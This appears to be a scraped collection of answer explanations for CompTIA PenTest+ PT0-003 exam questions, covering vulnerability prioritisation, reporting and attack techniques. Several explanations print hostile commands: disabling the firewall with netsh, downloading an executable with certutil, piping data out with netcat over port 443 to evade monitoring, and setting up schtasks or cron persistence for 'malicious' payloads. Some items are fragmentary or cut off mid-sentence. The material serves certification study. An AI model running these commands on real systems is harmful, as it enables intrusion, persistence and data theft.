PT0-003 CompTIA PenTest+ Exam Questions and Answers

The correct answer is A. Target 1: EPSS Score = 0.6 and CVSS Score = 4

EPSS, the Exploit Prediction Scoring System, estimates the likelihood that a vulnerability will be exploited in the wild. CVSS, the Common Vulnerability Scoring System, measures the severity or technical impact of a vulnerability.

The question asks which target is most likely to get attacked, so the EPSS score is the most important factor. The highest EPSS score shown is 0.6, which appears in both Target 1 and Target 3.

Between those two, Target 1 has the higher CVSS score:

Target 1: EPSS 0.6, CVSS 4

Target 3: EPSS 0.6, CVSS 1

Since both have the same exploitation likelihood, the vulnerability with the higher impact/severity is the better choice. Therefore, Target 1 is the most likely and more meaningful attack target.

B is incorrect because its EPSS score is lower at 0.3.

C is incorrect because although its EPSS score is tied for highest, its CVSS score is much lower than Target 1.

D is incorrect because it has the highest CVSS score, but its EPSS score is lower than Target 1 and Target 3. A higher CVSS score means greater severity, not necessarily a higher likelihood of exploitation.

In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically vulnerability prioritization using exploit likelihood and severity metrics.

If a penetration tester gains access to a host but does not have a shell, the best tool for further enumeration is Netcat. Here’s why:

Netcat:

Versatility: Netcat is known as the " Swiss Army knife " of networking tools. It can be used for port scanning, banner grabbing, and setting up reverse shells.

Enumeration: Without a shell, Netcat can help enumerate open ports and services running on the host, providing insight into the host ' s environment.

Comparison with Other Tools:

ProxyChains: Used to chain proxies together, not directly useful for enumeration without an initial shell.

PowerShell ISE: Requires a shell to execute commands and scripts.

Process IDs: Without a shell, enumerating process IDs directly isn’t possible.

Netcat’s ability to perform multiple network-related tasks without needing a shell makes it the best choice for further enumeration.

======

Explanation of the Correct Option:

A (responder and ntlmrelayx.py):

Responder is a tool for intercepting and relaying NTLM authentication requests.

Since SMB signing is disabled, ntlmrelayx.py can relay authentication requests and escalate privileges to move laterally without directly brute-forcing credentials, which is stealthier.

Why Not Other Options?

B: Exploiting MS17-010 (psexec) is noisy and likely to trigger alerts.

C: Brute-forcing credentials with Hydra is highly detectable due to the volume of failed login attempts.

D: Nmap scripts like smb-brute.nse are useful for enumeration but involve brute-force methods that increase detection risk.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

The script shows:

Use of BlobServiceClient.from_connection_string() — this is Azure Blob Storage interaction.

It opens a local file in binary mode (with open(file_path, " rb " )).

Calls blob_client.upload_blob(data) — clearly indicating uploading the local file to cloud storage.

This matches data exfiltration activity, where stolen or sensitive local files are sent to an external system (cloud storage).

Why not the others?

A. API endpoint: The code uses Azure Blob storage SDK, not a REST API endpoint.

B. Download data from cloud storage: Code uploads, not downloads.

C. Alternate data streams (ADS): That’s a Windows NTFS feature, unrelated to cloud storage.

CompTIA PT0-003 Objective Mapping:

Domain 3.0 Attacks and Exploits

3.2: Post-exploitation techniques (data exfiltration, cloud storage use).

The attack narrative is a critical part of the report that tells the story of how the tester exploited vulnerabilities, gained access, and moved laterally. It helps stakeholders understand the real-world impact in a readable and logical sequence.

User activities are more operational logs than part of a pentest report.

Customer remediation plan is the client’s responsibility.

Key management might be discussed but is not a required component of the report.

Understanding netsh.exe:

Purpose: Configures network settings, including IP addresses, DNS, and firewall settings.

Firewall Management: Can enable, disable, or modify firewall rules.

Disabling the Firewall:

Command: Use netsh.exe to disable the firewall.

netsh advfirewall set allprofiles state off

Usage in Penetration Testing:

Pivoting: Disabling the firewall can help the penetration tester pivot from one system to another by removing network restrictions.

Command Execution: Ensure the command is executed with appropriate privileges.

References from Pentesting Literature:

netsh.exe is commonly mentioned in penetration testing guides for configuring network settings and managing firewalls.

HTB write-ups often reference the use of netsh.exe for managing firewall settings during network-based penetration tests.

When Nmap is unavailable on a compromised host, PenTest+ expects testers to adapt by using native scripting (for example, PowerShell) to perform reconnaissance and port checks with built-in .NET classes such as System.Net.Sockets.TcpClient. To scan multiple ports, the script must iterate over two dimensions: the host range and the port list. In PowerShell, supplying a comma-separated list to a variable (for example, $port = 80,443,445) creates an array-like collection. The correct way to use that collection is to add a nested Foreach loop inside the existing loop that iterates through IPs, so each reachable host is tested against every port in the list.

Duplicating the socket block (A) is inefficient, error-prone, and does not scale as the number of ports grows. Option C is not the correct syntax for combining two enumerations in a single Foreach header; PowerShell requires a separate loop (or pipeline) to iterate ports. Therefore, adding a second Foreach directly beneath the current one and enclosing the socket logic within it best achieves the intended multi-port scanning behavior.

This is a session fixation vulnerability because the application is reusing the same session identifier before and after authentication instead of issuing a new one upon successful login. In secure session management, the server should regenerate the session token after a user authenticates so that any pre-authenticated session identifier cannot be abused. If an attacker can force or predict a victim’s session ID before login, and the application keeps that same ID after authentication, the attacker may be able to hijack the authenticated session. That is the essence of session fixation. This is not JWT manipulation because there is no indication of token tampering, not cookie poisoning because the issue is not altered cookie content, and not a collision attack because no hash collision scenario is described. The flaw is improper session regeneration after authentication.

Evilginx is the most appropriate choice because it is specifically designed to perform adversary-in-the-middle phishing attacks that can capture credentials, session cookies, and authentication tokens in real time. In penetration testing, this makes it highly relevant for demonstrating weaknesses in authentication flows, including some multi-factor authentication implementations that rely on session handling after successful login. By proxying the victim’s connection to the legitimate website, Evilginx can collect the authenticated session and potentially bypass the need to repeatedly provide the second factor. The other tools do not fit this use case: Gophish is mainly for phishing campaign management, Recon-ng is for reconnaissance, BeEF focuses on browser exploitation after hook placement, and Yersinia targets Layer 2 network protocols. Therefore, Evilginx is the best answer for intercepting web authentication traffic to assess MFA bypass exposure.

OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.

Replay attack (Option C):

Attackers capture legitimate authentication tokens and reuse them to impersonate users.

OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.

The provided Bash script is used to ping a range of IP addresses to identify active hosts in a network. Here ' s a detailed breakdown of the script and the necessary modification:

Original Script:

1 network_addr= " 192.168.1 "

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo " Host $h is up "

6 else

7 echo " Host $h is down "

8 fi

9 done

Analysis:

Line 2: The loop uses {1..254} to iterate over the range of host addresses. However, this notation might not work in all shell environments, especially if not using bash directly or if the script runs in a different shell.

Using seq for Better Compatibility:

The seq command is a more compatible way to generate a sequence of numbers. It ensures the loop works in any POSIX-compliant shell.

Modified Line 2:

for h in $(seq 1 254); do

This change ensures broader compatibility and reliability of the script.

Modified Script:

1 network_addr= " 192.168.1 "

2 for h in $(seq 1 254); do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo " Host $h is up "

6 else

7 echo " Host $h is down "

8 fi

9 done

======

The correct answer is C. Prompt injection

Prompt injection occurs when an attacker crafts input that causes an AI system to ignore, bypass, or override its intended instructions, safety rules, or output restrictions. In this scenario, the chatbot accepts harmful or policy-violating variations, including malicious links, encoded data leakage, and abusive content. These are indicators that user-supplied prompts can manipulate the chatbot’s behavior.

A is incorrect because container escape involves breaking out of an isolated container environment to access the host or other containers. The question is about manipulating chatbot responses, not container isolation.

B is incorrect because output fuzzing is a testing technique that varies inputs to observe how outputs change. It may be used to discover the issue, but it is not the vulnerability being described.

D is incorrect because model manipulation generally refers to changing or poisoning the model itself, such as altering training data, weights, or behavior at the model level. The scenario describes malicious user inputs affecting responses, which is prompt injection.

In PenTest+ terms, this falls under Attacks and Exploits, specifically AI/LLM-related attacks, prompt injection, and testing for unsafe chatbot behavior.

A template ensures consistency across reports by defining the required sections (scope, methodology, findings, risk ratings, remediation, evidence, executive summary, and appendices). Standardization helps reviewers and clients quickly find required information, supports quality assurance, and ensures compliance with contractual/reporting requirements. While templates also help articulate risks and contextualize data (A and C) and may indirectly save time (E), their primary purpose is to standardize needed information so every engagement includes the same baseline content and structure.

CompTIA PT0-003 Mapping:

Domain 5.0 Reporting and Communication — produce consistent, repeatable reports and use templates to ensure completeness and QA.

To avoid triggering IDS/IPS alerts, the attacker should use offline cracking on compromised hashes rather than direct brute-force attempts.

Crack user accounts using compromised hashes (Option A):

Hashes can be cracked offline using tools like Hashcat or John the Ripper.

No direct login attempts, avoiding detection by security systems.

Hidden form fields in web applications can store user roles, session tokens, and security parameters that attackers may exploit.

HTML scraping (Option D):

Involves analyzing HTML source code to find hidden fields like:

< input type= " hidden " name= " admin_access " value= " true " >

Attackers use tools like Burp Suite, ZAP, or browser developer tools (Ctrl+U or Inspect Element) to locate hidden fields.

In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.

Metadata Services:

Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.

Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.

Other Features:

IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.

Block Storage: Provides persistent storage but does not directly expose initialization data.

Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.

Pentest References:

Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.

Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.

By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.

======

To perform credentialed scans on an Active Directory (AD) server, the scanner requires high-level access to retrieve system configuration, patch levels, and user rights. A Domain Administrator account ensures full visibility into domain resources and permissions, which is essential for a complete vulnerability assessment.

From the CompTIA PenTest+ PT0-003 Objectives – Domain 2.0: Information Gathering and Vulnerability Identification:

“Credentialed scans require administrative-level access on target systems to provide detailed insights into software versions, missing patches, and security settings.”

The vulnerability report identifies a TLS vulnerability on port 443 (HTTPS). However, the Nmap scan shows port 443 as closed, meaning the service is not running or reachable.

If the service associated with the vulnerability is not active, the reported issue cannot be valid. Therefore, the scan result contradicts the finding — making it a false positive (the scanner incorrectly flagged a vulnerability that doesn’t exist).

Why not the others:

A. True negative: Would mean no vulnerability exists and none was reported.

B. True positive: Would mean both the scan and vulnerability report agree that the service is running and vulnerable — not the case here.

C. False negative: Would mean a vulnerability exists but was not detected — also not the case.

CompTIA PT0-003 Mapping:

Domain 2.0: Information Gathering and Vulnerability Scanning

Interpret scan results and distinguish between true/false positives and negatives.

The issue with the script lies in how the while loop reads the file containing the list of domains. The current script doesn ' t correctly redirect the file ' s content to the loop. Changing line 5 to done < " $DOMAINS_LIST " correctly directs the loop to read from the file.

Step-by-Step Explanation

Original Script:

DOMAINS_LIST= " /path/to/list.txt "

while read -r i; do

nikto -h $i -o scan-$i.txt &

done

Identified Problem:

The while read -r i; do loop needs to know which file to read lines from. Without redirecting the input file to the loop, it doesn ' t process any input.

Solution:

Add done < " $DOMAINS_LIST " to the end of the loop to specify the input source.

Corrected script:

DOMAINS_LIST= " /path/to/list.txt "

while read -r i; do

nikto -h $i -o scan-$i.txt &

done < " $DOMAINS_LIST "

done < " $DOMAINS_LIST " ensures that the while loop reads each line from DOMAINS_LIST.

This fix makes the loop iterate over each domain in the list and run nikto against each.

References from Pentesting Literature:

Scripting a

======

Importance of a Clear Executive Summary:

The executive summary is essential because it provides decision-makers with a concise overview of the findings, risks, and recommendations without requiring deep technical knowledge.

Clarity in objectives ensures that all stakeholders understand the purpose, scope, and outcomes of the test.

Why Not Other Options?

A: Keeping video and audio records is helpful during testing but not typically included in the final report for handling purposes.

B: Limiting the report to 5–10 pages may compromise its comprehensiveness and omit critical details.

C: Recommendations based solely on the risk score may not address the broader context or organizational priorities.

CompTIA Pentest+ References:

Domain 5.0 (Reporting and Communication)

The tester is attempting to register a malicious DLL as a server-level plugin to escalate privileges.

Privilege escalation (Option B):

The command uses dnscmd.exe, a legitimate Windows tool for managing DNS servers.

By setting a malicious DLL (adduser.dll) as a server-level plugin, attackers can gain SYSTEM-level privileges.

This technique is a DLL hijacking attack.

In the final report for a penetration test engagement, the section that most likely contains details on the impact, overall security findings, and high-level statements is the executive summary. Here’s why:

Purpose of the Executive Summary:

It provides a high-level overview of the penetration test findings, including the most critical issues, their impact on the organization, and general recommendations.

It is intended for executive management and other non-technical stakeholders who need to understand the security posture without delving into technical details.

Contents of the Executive Summary:

Impact: Discusses the potential business impact of the findings.

Overall Security Findings: Summarizes the key vulnerabilities identified during the engagement.

High-Level Statements: Provides strategic recommendations and a general assessment of the security posture.

Comparison to Other Sections:

Quality Control: Focuses on the measures taken to ensure the accuracy and quality of the testing process.

Methodology: Details the approach and techniques used during the penetration test.

Risk Scoring: Provides detailed risk assessments and scoring for specific vulnerabilities but does not offer a high-level overview suitable for executives.

======

The correct answer is B. Provide the customer with a list of the changes made.

At the end of a penetration test, the tester must support post-engagement cleanup and restoration. To verify that exploited systems have been returned to their original state, the tester should provide the customer with a complete list of changes made during the engagement. This allows the client to confirm that all modifications, deployed tools, payloads, accounts, configuration changes, scripts, files, and other artifacts have been removed or restored appropriately.

A is incorrect because terminating a command-and-control payload addresses only one possible artifact. It does not verify that all exploited systems have been restored to preengagement conditions.

C is incorrect because restoring environment variables may be part of cleanup, but it is too narrow and only applies if environment variables were changed.

D is incorrect because reimaging a system is disruptive and may not be necessary. It should only be done if required by the client’s recovery process or if restoration cannot be otherwise verified.

In PenTest+ terms, this falls under Reporting and Communication, specifically post-engagement cleanup, restoration validation, documentation of changes, and client handoff.

Windows provides built-in utilities for user enumeration and privilege escalation.

net command (Option C):

The net command is used to list users, groups, and shares on a Windows system:

net user

net localgroup administrators

net group " Domain Admins " /domain

Useful for gathering privilege escalation targets and understanding user permissions.

Given an insecure wireless network (e.g., open or poorly secured Wi-Fi), a practical initial access technique is to capture or poison name resolution/authentication requests from client systems once they are on that network. Responder is designed to perform LLMNR/NBT-NS/MDNS poisoning and capture NTLM authentication attempts and other credential material on a local network segment. On an insecure Wi-Fi network an attacker can either join the network or run a rogue AP and then run Responder to capture credentials from connected clients — a typical and effective initial-access method in such scenarios.

Why not the others:

B. Metasploit — a general exploitation framework; useful after finding a vulnerable service, but not specifically the most-likely initial tool on an insecure Wi-Fi.

C. Netcat — a raw TCP/UDP utility (listeners/shells); useful post-exploitation but not for capturing broadcast name resolution requests.

D. Nmap — a scanner to discover hosts/ports; helpful reconnaissance, but not directly used to capture credentials on a local insecure wireless segment.

CompTIA PT0-003 Mapping: Wireless/host-based attacks and network credential-capture techniques (evil twin/rogue AP and LLMNR/NetBIOS poisoning).

Debugging Mode:

Purpose: Debugging mode provides detailed error messages and debugging information, useful during development.

Risk: In a production environment, it exposes sensitive information and vulnerabilities, making the system more susceptible to attacks.

Common Causes:

Configuration Changes: During testing or penetration testing, configurations might be altered to facilitate debugging. If not reverted, these changes can leave the system in a vulnerable state.

Oversight: Configuration changes might be overlooked during deployment.

Best Practices:

Deployment Checklist: Ensure a checklist is followed that includes reverting any debug configurations before moving to production.

Configuration Management: Use configuration management tools to track and manage changes.

References from Pentesting Literature:

The importance of reverting configuration changes is highlighted in penetration testing guides to prevent leaving systems in a vulnerable state post-testing.

HTB write-ups often mention checking and ensuring debugging modes are disabled in production environments.

When the objective is to identify hosts while minimizing the chance of triggering an IPS, PenTest+ prioritizes low-noise reconnaissance techniques over active probing. A reverse DNS lookup queries DNS PTR records for IP addresses and can reveal hostnames for systems that are already registered in internal DNS. This often generates traffic that appears similar to normal enterprise name-resolution activity and is typically less suspicious than broad ICMP echo sweeps or repeated port probes.

An Nmap ping sweep is an overt discovery action that sends ICMP (and sometimes ARP/other probes) across a range and is more likely to be detected or rate-limited by monitoring and IPS controls. LLMNR poisoning with Responder is an active interception/credential capture technique that can be highly detectable and is not simply “host identification.” Viewing the local routing table is very quiet, but it primarily reveals networks and routes, not a list of live hosts on the segment. Therefore, reverse DNS lookups are the most logical balance of effectiveness and stealth for identifying hosts.

Certutil.exe for File Downloads:

certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.

Example command:

bash

Copy code

certutil.exe -urlcache -split -f http://example.com/file.exe file.exe

Its native status helps it evade detection by security tools.

Why Not Other Options?

A (netsh.exe): Used for network configuration but not for downloading files.

C (nc.exe): Netcat is not native to Windows and would need to be introduced to the system.

D (cmdkey.exe): Used for managing stored credentials, not downloading files.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Evaluation Criteria:

CVSS (Common Vulnerability Scoring System): Indicates the severity of vulnerabilities, with higher scores representing more critical vulnerabilities.

EPSS (Exploit Prediction Scoring System): Estimates the likelihood of a vulnerability being exploited in the wild.

Analysis:

hrdatabase: CVSS = 9.9, EPSS = 0.50

financesite: CVSS = 8.0, EPSS = 0.01

legaldatabase: CVSS = 8.2, EPSS = 0.60

fileserver: CVSS = 7.6, EPSS = 0.90

Selection Justification:

fileserver has the highest EPSS score of 0.90, indicating a high likelihood of exploitation despite having a slightly lower CVSS score compared to other targets.

This makes it a critical target for immediate testing to mitigate potential exploitation risks.

Pentest References:

Risk Prioritization: Balancing between severity (CVSS) and exploitability (EPSS) is crucial for effective vulnerability management.

Risk Assessment: Evaluating both the impact and the likelihood of exploitation helps in making informed decisions about testing priorities.

By selecting the fileserver, the penetration tester focuses on a target that is highly likely to be exploited, addressing the most immediate risk based on the given scores.

Top of Form

Bottom of Form

When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here ' s why:

Understanding Smishing:

Smishing (SMS phishing) involves sending fraudulent messages via SMS to trick individuals into revealing personal information or performing actions that compromise security. Since the tester has access to phone numbers, this method is directly applicable.

Why Smishing is Effective:

Personalization: Knowing the first and last names allows the attacker to personalize the messages, making them appear more legitimate and increasing the likelihood of the target responding.

Immediate Access: People tend to trust and respond quickly to SMS messages compared to emails, especially if the messages appear urgent or important.

Alternative Attack Techniques:

Impersonation: While effective, it generally requires real-time interaction and may not scale well across many targets.

Tailgating: This physical social engineering technique involves following someone into a restricted area and is not feasible with just names and phone numbers.

Whaling: This targets high-level executives with highly personalized phishing attacks. Although effective, it is more specific and may not be suitable for the broader set of employees in the directory.

======

PsExec is a Windows Sysinternals tool that allows users to execute commands on a remote system without needing an interactive login session. The command above is executing cmd.exe on a remote Windows Active Directory domain machine (server01.cor.ptia.org).

Option A (Test connectivity using PsExec) ❌: The command does not check connectivity; it executes a command remotely.

Option B (Perform a lateral movement attack) ✅: Correct. Lateral movement occurs when an attacker moves from one compromised machine to another within a network, using valid credentials. PsExec is often used for this purpose.

Option C (Send the PsExec binary) ❌: The command runs cmd.exe remotely, but it does not transfer PsExec itself.

Option D (Enable cmd.exe) ❌: cmd.exe is already enabled by default on most Windows systems.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Lateral Movement with PsExec

The correct answer is A. Decompile the bytecode.

Java applications are commonly distributed as archive files such as .jar, .war, or .ear files. These archives usually contain compiled Java bytecode in .class files rather than the original readable source code.

To perform static analysis, the tester must inspect the application without executing it. Therefore, the first practical step is to extract and decompile the Java bytecode back into readable Java-like source code using tools such as JD-GUI, CFR, FernFlower, or JADX.

B is incorrect because fuzz testing is a dynamic testing technique. It involves sending malformed or unexpected inputs to a running application, not reviewing the application statically.

C is incorrect because a .so file is a Linux shared object library. Converting a Java archive to a .so file is not part of Java static analysis.

D is incorrect because the Java interpreter is part of the runtime environment. Disassembling the interpreter does not analyze the target Java application.

In PenTest+ terms, this falls under Tools and Code Analysis, specifically static application security testing, reverse engineering Java archives, and reviewing compiled bytecode for security flaws.

Moorche2026-04-29T01:08:00.59M

The command snmpwalk -v 2c -c public 192.168.1.23 is used to query SNMP (Simple Network Management Protocol) data from a device. Here’s the purpose in the context provided:

SNMP Enumeration:

Function: snmpwalk is used to retrieve a large amount of information from the target device using SNMP.

Version: -v 2c specifies the SNMP version.

Community String: -c public specifies the community string, which is essentially a password for SNMP queries.

Purpose of the Command:

Validate Results: The tester uses SNMP to gather detailed information about the network devices to confirm the findings of the vulnerability scanner and remove any false positives.

Detailed Information: SNMP can provide detailed information about device configurations, network interfaces, and other settings that can validate the scanner’s results.

Comparison with Other Options:

Bypassing Defensive Systems (A): Not directly related to SNMP enumeration.

Using Automation Tools (B): While SNMPwalk is automated, the primary purpose here is validation.

Script Exploits (C): SNMPwalk is not used for scripting exploits but for information gathering.

By using snmpwalk, the tester is validating the results from the vulnerability scanner and removing any false positives, ensuring accurate reporting.

======

Risk scores quantify the severity and likelihood of exploitation for each finding. This helps organizations prioritize which vulnerabilities to remediate first based on potential impact and exploitability.

Methodology outlines how the test was performed.

Findings list shows issues, but without prioritization.

Executive summary provides a high-level overview for decision-makers, not technical prioritization.

WiGLE.net is the best choice because it is purpose-built for identifying and mapping wireless networks (SSIDs/BSSIDs) using aggregated wardriving-style data and location-based search. In PenTest+ reconnaissance, testers often need to quickly determine what wireless networks are present in or around a physical location—especially when assessing how corporate mobile devices might encounter nearby SSIDs that could be abused for evil-twin or misassociation scenarios. WiGLE helps identify networks by area and provides details that support follow-on testing decisions, such as which SSIDs are common, whether naming patterns suggest corporate ownership, and whether nearby networks could confuse users or devices.

Wireshark is a packet analyzer and requires traffic capture; it is not a discovery database for “what networks exist” in a geographic area. theHarvester and Recon-ng are OSINT tools oriented toward emails, domains, hosts, and identity data—not local wireless network identification. For the stated goal of identifying available Wi-Fi networks for mobile-device exposure assessment, WiGLE.net most directly fits the objective.

The tester identified an HTTPS downgrade attack (e.g., SSL stripping). The best mitigation is to enforce HSTS (HTTP Strict Transport Security).

HSTS (Option A):

HSTS (Strict-Transport-Security) ensures that the browser always uses HTTPS, preventing downgrade attacks.

Example header:

Strict-Transport-Security: max-age=31536000; includeSubDomains

The syntax (1..254) is incorrect in Bash, as it uses brace expansion or seq for looping. The correct syntax should be:

for i in $(seq 1 254)

Also, the missing do is an issue, but the syntax error mentioned points specifically to the loop structure. Fixing the sequence format resolves it.

Corrected script:

#!/bin/bash

for i in $(seq 1 254); do

ping -c1 192.168.1.$i

done

From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 4 – Scanning & Enumeration):

“Bash scripting is commonly used for automation in enumeration. The ' seq ' command generates a sequence of numbers for iteration in loops.”

The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle. Here’s why option B is correct:

OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.

OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.

MITRE ATT & CK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.

CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.

References from Pentest:

Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments​​.

Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing​​.

Conclusion:

Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.

======

Burp Suite Community Edition imposes limitations that can slow high-volume Intruder activities, particularly when performing repetitive request mutation such as parameter fuzzing, directory/file discovery, or input testing with wordlists. In PenTest+ tooling guidance, testers are expected to select alternative tools when a platform constraint reduces efficiency while still keeping the testing objective the same. Wfuzz is designed specifically for fast web fuzzing: it can rapidly send large volumes of HTTP requests while varying parameters, headers, paths, or payload positions using wordlists, and it supports filtering/matching responses (status codes, response size, strings) to identify interesting results—functionally similar to many Intruder use cases.

TruffleHog focuses on discovering exposed secrets in repositories and artifacts, not accelerating web request fuzzing. Postman is primarily an API client for building and replaying requests, but it is not optimized as a high-speed fuzzing engine. WPScan targets WordPress-specific enumeration and vulnerability checks and won’t provide general-purpose Intruder-like fuzzing across arbitrary web applications. Therefore, Wfuzz is the best option to speed up and achieve comparable fuzzing outcomes.

AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.

Encrypting Data with AES-256:

Use a secure key and initialization vector (IV) to encrypt the data using the AES-256 algorithm.

Example encryption command using OpenSSL:

Step-by-Step Explanationopenssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey

Setting Up a Secure Tunnel:

Use a tool like OpenSSH to create a secure tunnel over TCP port 443.

Example command to set up a tunnel:

ssh -L 443:targetserver:443 user@intermediatehost

Transferring Data Over the Tunnel:

Use a tool like Netcat or SCP to transfer the encrypted data through the tunnel.

Example Netcat command to send data:

cat encrypted.bin | nc targetserver 443

Benefits of Using AES-256 and Port 443:

Security: AES-256 provides strong encryption, making it difficult for attackers to decrypt the data without the key.

Stealth: Sending data over port 443 helps avoid detection by security monitoring systems, as it appears as regular HTTPS traffic.

Real-World Example:

During a penetration test, the tester needs to exfiltrate sensitive data without triggering alerts. By encrypting the data with AES-256 and sending it over a tunnel to TCP port 443, the data exfiltration blends in with normal secure web traffic.

References from Pentesting Literature:

Various penetration testing guides and HTB write-ups emphasize the importance of using strong encryption like AES-256 for secure data transfer.

Techniques for creating secure tunnels and exfiltrating data covertly are often discussed in advanced pentesting resources.

To see any vulnerabilities that may be visible from outside of the organization, the penetration tester should perform an unauthenticated scan.

Unauthenticated Scan:

Definition: An unauthenticated scan is conducted without providing any credentials to the scanning tool. It simulates the perspective of an external attacker who does not have any prior access to the system.

Purpose: Identifies vulnerabilities that are exposed to the public and can be exploited without authentication. This includes open ports, outdated software, and misconfigurations visible to the outside world.

Comparison with Other Scans:

SAST (Static Application Security Testing): Analyzes source code for vulnerabilities, typically used during the development phase and not suitable for external vulnerability scanning.

Sidecar: This term is generally associated with microservices architecture and is not relevant to the context of vulnerability scanning.

Host-based: Involves scanning from within the network and often requires authenticated access to the host to identify vulnerabilities. It is not suitable for determining external vulnerabilities.

Pentest References:

External Vulnerability Assessment: Conducting unauthenticated scans helps identify the attack surface exposed to external threats and prioritizes vulnerabilities that are accessible from the internet.

Tools: Common tools for unauthenticated scanning include Nessus, OpenVAS, and Nmap.

By performing an unauthenticated scan, the penetration tester can identify vulnerabilities that an external attacker could exploit without needing any credentials or internal access.

======

Data Loss Prevention (DLP) tools monitor sensitive data and prevent unauthorized exfiltration. The two best options to bypass DLP are:

Compress and encrypt the data (Option B):

Compression reduces file size, making detection harder. Encryption further protects the data by making it unreadable without a key.

DLP tools often inspect content based on known patterns (e.g., credit card numbers, sensitive keywords). Encrypted files bypass content inspection since DLP cannot analyze encrypted data.

Responder is a tool used for capturing and analyzing NetBIOS, LLMNR, and MDNS queries to perform various man-in-the-middle (MITM) attacks. It can be used to capture hashed credentials, which can then be cracked offline. Using Responder has the least impact on the host ' s operating stability compared to more aggressive methods like buffer overflow attacks or payload injections.

Understanding Responder:

Purpose: Responder is used to capture NTLMv2 hashes from a Windows network.

Operation: It listens on the network for LLMNR, NBT-NS, and MDNS requests and responds to them, tricking the client into authenticating with the attacker ' s machine.

Command Breakdown:

responder -I eth0: Starts Responder on the network interface eth0.

john responder_output.txt: Uses John the Ripper to crack the hashes captured by Responder.

< rdp to target > : Suggests the next step after capturing credentials might involve using RDP with the cracked password, but the initial capture is passive and low impact.

Why This is the Best Choice:

Least Impact: Responder passively captures network traffic without interacting directly with the target host’s system processes.

Stealth: It operates quietly on the network, making it less likely to cause stability issues or be detected by host-based security mechanisms.

References from Pentesting Literature:

Tools like Responder are discussed in penetration testing guides for initial reconnaissance and credential gathering without causing significant disruptions.

HTB write-ups frequently mention the use of Responder in network-based attacks to capture credentials safely.

Step-by-Step ExplanationReferences:

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups

======

Based on the CVSS (Common Vulnerability Scoring System) and EPSS (Exploit Prediction Scoring System) scores, Target 1 is the most likely to get attacked.

CVSS:

Definition: CVSS provides a numerical score to represent the severity of a vulnerability, helping to prioritize the response based on the potential impact.

Score Range: Scores range from 0 to 10, with higher scores indicating more severe vulnerabilities.

EPSS:

Definition: EPSS estimates the likelihood that a vulnerability will be exploited in the wild within the next 30 days.

Score Range: EPSS scores range from 0 to 1, with higher scores indicating a higher likelihood of exploitation.

Analysis:

Target 1: CVSS = 4, EPSS = 0.6

Target 2: CVSS = 2, EPSS = 0.3

Target 3: CVSS = 1, EPSS = 0.6

Target 4: CVSS = 4.5, EPSS = 0.4

Target 1 has a moderate CVSS score and a high EPSS score, indicating it has a significant vulnerability that is quite likely to be exploited.

Pentest References:

Vulnerability Prioritization: Using CVSS and EPSS scores to prioritize vulnerabilities based on severity and likelihood of exploitation.

Risk Assessment: Understanding the balance between impact (CVSS) and exploit likelihood (EPSS) to identify the most critical targets for remediation or attack.

By focusing on Target 1, which has a balanced combination of severity and exploitability, the penetration tester can address the most likely target for attacks based on the given scores.

======

To maintain access to a compromised system after rebooting, a penetration tester should create a scheduled task. Scheduled tasks are designed to run automatically at specified times or when certain conditions are met, ensuring persistence across reboots.

Persistence Mechanisms:

Scheduled Task: Creating a scheduled task ensures that a specific program or script runs automatically according to a set schedule or in response to certain events, including system startup. This makes it a reliable method for maintaining access after a system reboot.

Reverse Shell: While establishing a reverse shell provides immediate access, it typically does not survive a system reboot unless coupled with another persistence mechanism.

Process Injection: Injecting a malicious process into another running process can provide stealthy access but may not persist through reboots.

Credential Dumping: Dumping credentials allows for re-access by using stolen credentials, but it does not ensure automatic access upon reboot.

Creating a Scheduled Task:

On Windows, the schtasks command can be used to create scheduled tasks. For example:

schtasks /create /tn " Persistence " /tr " C:\path\to\malicious.exe " /sc onlogon /ru SYSTEM

On Linux, a cron job can be created by editing the crontab:

(crontab -l; echo " @reboot /path/to/malicious.sh " ) | crontab -

Pentest References:

Maintaining persistence is a key objective in post-exploitation. Scheduled tasks (Windows Task Scheduler) and cron jobs (Linux) are commonly used techniques.

References to real-world scenarios include creating scheduled tasks to execute malware, keyloggers, or reverse shells automatically on system startup.

By creating a scheduled task, the penetration tester ensures that their access method (e.g., reverse shell, malware) is executed automatically whenever the system reboots, providing reliable persistence.

======

